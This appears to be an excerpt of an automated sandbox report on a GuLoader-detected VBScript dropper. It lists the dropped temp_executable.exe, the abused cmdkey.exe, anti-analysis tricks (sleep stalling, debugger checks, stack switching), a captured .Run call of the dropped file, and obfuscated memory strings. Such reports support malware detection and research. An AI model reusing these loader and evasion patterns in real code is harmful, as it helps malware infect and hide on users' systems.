        Source: C:\Windows\explorer.exeSection loaded: efsutil.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: dsrole.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: windows.internal.system.userprofile.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: cloudexperiencehostbroker.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
        Source: Zeskanowana lista przedmiot#U00f3w nr 84329.vbsStatic file information: File size 1306825 > 1048576
        Source: Binary string: wntdll.pdb source: temp_executable.exe, cmdkey.exe

        Data Obfuscation

        barindex
        VBScript performs obfuscated calls to suspicious functions
        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("C:\Users\user\AppData\Local\Temp\temp_executable.exe", "1", "true");
        Yara detected GuLoader
        Source: Yara matchFile source: 00000003.00000002.20209174867.0000000001876000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.19989077508.00000000032B6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 2_2_6FC32351 GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,2_2_6FC32351
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D408CD push ecx; mov dword ptr [esp], ecx3_2_32D408D6
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32A36AE9 pushad ; retf 3_2_32A36B10
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32A3562C push ss; retf 3_2_32A35636
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32A3CE73 push ebp; iretd 3_2_32A3CE78
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32A36245 push ecx; iretd 3_2_32A3627D
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32A35BE8 push ss; iretd 3_2_32A35CB1
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32A3FF58 push edi; iretd 3_2_32A3FF66
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32A35C8E push ss; iretd 3_2_32A35CB1
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32A35C32 push ss; iretd 3_2_32A35CB1
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32A36438 push ebp; retf 3_2_32A3643B
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32A401A7 push esi; ret 3_2_32A401A8
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32A37585 push sp; ret 3_2_32A37589
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32A361F9 push ecx; iretd 3_2_32A3627D
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32A3CDF8 push ebp; iretd 3_2_32A3CE78
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32A3CD75 push FFFFFFA0h; retf 3_2_32A3CDEA
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038408CD push ecx; mov dword ptr [esp], ecx5_2_038408D6
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03715BE8 push ss; iretd 5_2_03715CB1
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03725272 push eax; ret 5_2_03725274
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03716245 push ecx; iretd 5_2_0371627D
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03716AE9 pushad ; retf 5_2_03716B10
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_037161F9 push ecx; iretd 5_2_0371627D
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_037201A7 push esi; ret 5_2_037201A8
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0371FF58 push edi; iretd 5_2_0371FF66
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0371CE73 push ebp; iretd 5_2_0371CE78
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0371562C push ss; retf 5_2_03715636
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0371CD75 push FFFFFFA0h; retf 5_2_0371CDEA
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0371CDF8 push ebp; iretd 5_2_0371CE78
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03717585 push sp; ret 5_2_03717589
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03715C32 push ss; iretd 5_2_03715CB1
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03716438 push ebp; retf 5_2_0371643B
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03715C8E push ss; iretd 5_2_03715CB1
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeFile created: C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dllJump to dropped file
        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\temp_executable.exeJump to dropped file
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Found stalling execution ending in API Sleep call
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeStalling execution: Execution stalls by calling Sleepgraph_2-4354
        Switches to a custom stack to bypass stack traces
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeAPI/Special instruction interceptor: Address: 34CEB08
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeAPI/Special instruction interceptor: Address: 1A8EB08
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeAPI/Special instruction interceptor: Address: 7FFE6B430594
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeAPI/Special instruction interceptor: Address: 7FFE6B42FF74
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeAPI/Special instruction interceptor: Address: 7FFE6B42D6C4
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeAPI/Special instruction interceptor: Address: 7FFE6B42D864
        Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFE6B42D144
        Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFE6B430594
        Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFE6B42D764
        Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFE6B42D324
        Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFE6B42D364
        Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFE6B42D004
        Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFE6B42FF74
        Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFE6B42D6C4
        Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FFE6B42D864
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D81763 rdtsc 3_2_32D81763
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeWindow / User API: threadDelayed 9852Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 879Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 878Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeAPI coverage: 0.3 %
        Source: C:\Windows\SysWOW64\cmdkey.exeAPI coverage: 1.0 %
        Source: C:\Windows\SysWOW64\cmdkey.exe TID: 7632Thread sleep count: 122 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exe TID: 7632Thread sleep time: -244000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exe TID: 7632Thread sleep count: 9852 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exe TID: 7632Thread sleep time: -19704000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\cmdkey.exeLast function: Thread delayed
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 2_2_004066F4 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_004066F4
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 2_2_004065AA FindFirstFileW,FindClose,2_2_004065AA
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 2_2_00402B75 FindFirstFileW,2_2_00402B75
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_00402B75 FindFirstFileW,3_2_00402B75
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_004066F4 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_004066F4
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_004065AA FindFirstFileW,FindClose,3_2_004065AA
        Source: wscript.exe, 00000000.00000003.19737646187.0000021570516000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bwRav0Y8MCdnM7/KvSEqmDw9xAWu1/vHhc;;;pxFXEFiGHgCb6AN...in;;;Wo8Zss9MGt18vmCIOxO8nbfX4ZlUcq+e91pvD4XSN0xlb4Zjobp+e5k/
        Source: wscript.exe, 00000000.00000003.19719138446.000002156FE91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: N...in;;;Wo8Zss9MGt18vmCIOxO8nbfX4ZlUcq+e91pvD4XSN0xlb4Zjobp+e5k/))Y/&&&IU&&&...lKL;;;
        Source: wscript.exe, 00000000.00000003.19739306186.000002157054D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19737152269.000002157051F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19732830491.00000215704D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19736701102.0000021570507000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19742070398.000002157054D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <&&&x50gXd...tK/jR&&&ihgfS+3WDuPEm
        Source: wscript.exe, 00000000.00000003.19717592851.000002156FE19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19717374132.000002156FE0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19717973004.000002156FE31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19718487210.000002156FE3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19717686950.000002156FE30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19716829408.000002156FDCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19717161793.000002156FDE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9v9Q/LNvymrnvviRFy...o+Glz4y...94rU1Y3ZhgfsUh9d89xgf5&&&s8sEGgfylXUy8Yz
        Source: wscript.exe, 00000000.00000003.19731988448.000002156FF46000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19733857534.000002156FF4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19734168798.000002156FF52000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <&&&x50gXd...tK/jR&&&ihgfS+3WDu1t[
        Source: wscript.exe, 00000000.00000003.19717478144.000002156FDF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19717559838.000002156FE06000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19716829408.000002156FDCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19717161793.000002156FDE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fyd0xazxDa0&&&F))&&&x50gXd...tK/jR&&&ihgfS+3WDu))qKD1DNCm&&&K4CpUwXrugyZ/dwG))gxMznyv8qr2vOZmUnCEL0dC7KEf8Ijim4yjsWraX;;;wuPiwwbEp7fdb;;;89))YlKo42gsS/x/&&&O;;;OO6YvmrXH7&&&7D))3kYsjIN...ibfbv&&&gfgor...wjqO73c5E...))GSql7vIE0Sakj6PWGeM493H2yCM/&&&HvQ26DOC0lh&&&f$
        Source: wscript.exe, 00000000.00000003.19699697478.0000021570399000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19697552235.0000021570390000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19696896139.0000021570372000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9v9Q/LNvymrnvviRFy...o+Glz4y...94rU1Y3ZhgfsUh9d89xgf5&&&s8sEGgfylXUy8Y
        Source: wscript.exe, 00000000.00000003.19720152791.000002156FE96000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19721127089.000002156FEB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19728912654.000002156FEDA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19722569290.000002156FED6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19723874670.000002156FED8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19719138446.000002156FE91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19720744467.000002156FEA5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lygzfyd0xazxDa0&&&F))&&&x50gXd...tK/jR&&&ihgfS+3WDu))qKD1DNCm&&&K4CpUwXrugyZ/dwG))gxMznyv8qr2vOZmUnCEL0dC7KEf8Ijim4yjsWraX;;;wuPiwwbEp7fdb;;;89))YlKo42gsS/x/&&&O;;;OO6YvmrXH7&&&7D))3kYsjIN...ibfbv&&&gfgor...wjqO73c5E...))GSql7vIE0Sakj6PWGeM493H2yCM/&&&HvQ26DOC0lh&&&fu
        Source: wscript.exe, 00000000.00000003.19732112682.000002156FD5A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19733444126.000002156FDAB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19745616939.000002156FDAC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19740878308.000002156FD55000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19732614950.000002156FD6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19733082746.000002156FD81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2sY7Q8IQQCM...vwgAEOIk/nERy1Oy+jKw/wjz&&&;;;5RRWwQlrFv/&&&aPWjGcrbXwUze8/io9xdv...6CwwFZkiYWs/GsqPv9A3...d7k;;;fD9itfgiFt3hFqzNA9v9Q/LNvymrnvviRFy...o+Glz4y...94rU1Y3ZhgfsUh9d89xgf5&&&s8sEGgfylXUy8YApHNlYXgj+zxb77WPkRCoLbmk1kzM2c;;;Wh7Qdet;;;&&&uc/1y/8yvb1b&&&0QwU0MC;;;+;;;X3C
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeAPI call chain: ExitProcess graph end nodegraph_2-4054
        Source: C:\Windows\SysWOW64\cmdkey.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D81763 rdtsc 3_2_32D81763
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D834E0 NtCreateMutant,LdrInitializeThunk,3_2_32D834E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 2_2_6FC32351 GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,2_2_6FC32351
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D632C5 mov eax, dword ptr fs:[00000030h]3_2_32D632C5
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D732C0 mov eax, dword ptr fs:[00000030h]3_2_32D732C0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D732C0 mov eax, dword ptr fs:[00000030h]3_2_32D732C0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E132C9 mov eax, dword ptr fs:[00000030h]3_2_32E132C9
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D502F9 mov eax, dword ptr fs:[00000030h]3_2_32D502F9
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D502F9 mov eax, dword ptr fs:[00000030h]3_2_32D502F9
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D502F9 mov eax, dword ptr fs:[00000030h]3_2_32D502F9
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D502F9 mov eax, dword ptr fs:[00000030h]3_2_32D502F9
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D502F9 mov eax, dword ptr fs:[00000030h]3_2_32D502F9
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D502F9 mov eax, dword ptr fs:[00000030h]3_2_32D502F9
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D502F9 mov eax, dword ptr fs:[00000030h]3_2_32D502F9
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D502F9 mov eax, dword ptr fs:[00000030h]3_2_32D502F9
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D372E0 mov eax, dword ptr fs:[00000030h]3_2_32D372E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D4A2E0 mov eax, dword ptr fs:[00000030h]3_2_32D4A2E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D4A2E0 mov eax, dword ptr fs:[00000030h]3_2_32D4A2E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D4A2E0 mov eax, dword ptr fs:[00000030h]3_2_32D4A2E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D4A2E0 mov eax, dword ptr fs:[00000030h]3_2_32D4A2E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D4A2E0 mov eax, dword ptr fs:[00000030h]3_2_32D4A2E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D4A2E0 mov eax, dword ptr fs:[00000030h]3_2_32D4A2E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D482E0 mov eax, dword ptr fs:[00000030h]3_2_32D482E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D482E0 mov eax, dword ptr fs:[00000030h]3_2_32D482E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D482E0 mov eax, dword ptr fs:[00000030h]3_2_32D482E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D482E0 mov eax, dword ptr fs:[00000030h]3_2_32D482E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3D2EC mov eax, dword ptr fs:[00000030h]3_2_32D3D2EC
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3D2EC mov eax, dword ptr fs:[00000030h]3_2_32D3D2EC
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D47290 mov eax, dword ptr fs:[00000030h]3_2_32D47290
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D47290 mov eax, dword ptr fs:[00000030h]3_2_32D47290
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D47290 mov eax, dword ptr fs:[00000030h]3_2_32D47290
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E092AB mov eax, dword ptr fs:[00000030h]3_2_32E092AB
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DBE289 mov eax, dword ptr fs:[00000030h]3_2_32DBE289
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E1B2BC mov eax, dword ptr fs:[00000030h]3_2_32E1B2BC
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E1B2BC mov eax, dword ptr fs:[00000030h]3_2_32E1B2BC
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E1B2BC mov eax, dword ptr fs:[00000030h]3_2_32E1B2BC
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E1B2BC mov eax, dword ptr fs:[00000030h]3_2_32E1B2BC
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3C2B0 mov ecx, dword ptr fs:[00000030h]3_2_32D3C2B0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DFF2AE mov eax, dword ptr fs:[00000030h]3_2_32DFF2AE
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D642AF mov eax, dword ptr fs:[00000030h]3_2_32D642AF
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D642AF mov eax, dword ptr fs:[00000030h]3_2_32D642AF
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D392AF mov eax, dword ptr fs:[00000030h]3_2_32D392AF
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DFF247 mov eax, dword ptr fs:[00000030h]3_2_32DFF247
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6F24A mov eax, dword ptr fs:[00000030h]3_2_32D6F24A
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3B273 mov eax, dword ptr fs:[00000030h]3_2_32D3B273
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3B273 mov eax, dword ptr fs:[00000030h]3_2_32D3B273
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3B273 mov eax, dword ptr fs:[00000030h]3_2_32D3B273
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DD327E mov eax, dword ptr fs:[00000030h]3_2_32DD327E
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DD327E mov eax, dword ptr fs:[00000030h]3_2_32DD327E
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DD327E mov eax, dword ptr fs:[00000030h]3_2_32DD327E
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DD327E mov eax, dword ptr fs:[00000030h]3_2_32DD327E
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DD327E mov eax, dword ptr fs:[00000030h]3_2_32DD327E
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DD327E mov eax, dword ptr fs:[00000030h]3_2_32DD327E
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DFD270 mov eax, dword ptr fs:[00000030h]3_2_32DFD270
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3821B mov eax, dword ptr fs:[00000030h]3_2_32D3821B
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DCB214 mov eax, dword ptr fs:[00000030h]3_2_32DCB214
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DCB214 mov eax, dword ptr fs:[00000030h]3_2_32DCB214
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3A200 mov eax, dword ptr fs:[00000030h]3_2_32D3A200
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D60230 mov ecx, dword ptr fs:[00000030h]3_2_32D60230
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DC0227 mov eax, dword ptr fs:[00000030h]3_2_32DC0227
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DC0227 mov eax, dword ptr fs:[00000030h]3_2_32DC0227
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DC0227 mov eax, dword ptr fs:[00000030h]3_2_32DC0227
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D7A22B mov eax, dword ptr fs:[00000030h]3_2_32D7A22B
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D7A22B mov eax, dword ptr fs:[00000030h]3_2_32D7A22B
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D7A22B mov eax, dword ptr fs:[00000030h]3_2_32D7A22B
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D733D0 mov eax, dword ptr fs:[00000030h]3_2_32D733D0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D743D0 mov ecx, dword ptr fs:[00000030h]3_2_32D743D0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DC43D5 mov eax, dword ptr fs:[00000030h]3_2_32DC43D5
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3E3C0 mov eax, dword ptr fs:[00000030h]3_2_32D3E3C0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3E3C0 mov eax, dword ptr fs:[00000030h]3_2_32D3E3C0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3E3C0 mov eax, dword ptr fs:[00000030h]3_2_32D3E3C0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3C3C7 mov eax, dword ptr fs:[00000030h]3_2_32D3C3C7
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D463CB mov eax, dword ptr fs:[00000030h]3_2_32D463CB
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6A390 mov eax, dword ptr fs:[00000030h]3_2_32D6A390
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6A390 mov eax, dword ptr fs:[00000030h]3_2_32D6A390
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6A390 mov eax, dword ptr fs:[00000030h]3_2_32D6A390
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D41380 mov eax, dword ptr fs:[00000030h]3_2_32D41380
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D41380 mov eax, dword ptr fs:[00000030h]3_2_32D41380
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D41380 mov eax, dword ptr fs:[00000030h]3_2_32D41380
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D41380 mov eax, dword ptr fs:[00000030h]3_2_32D41380
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D41380 mov eax, dword ptr fs:[00000030h]3_2_32D41380
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D5F380 mov eax, dword ptr fs:[00000030h]3_2_32D5F380
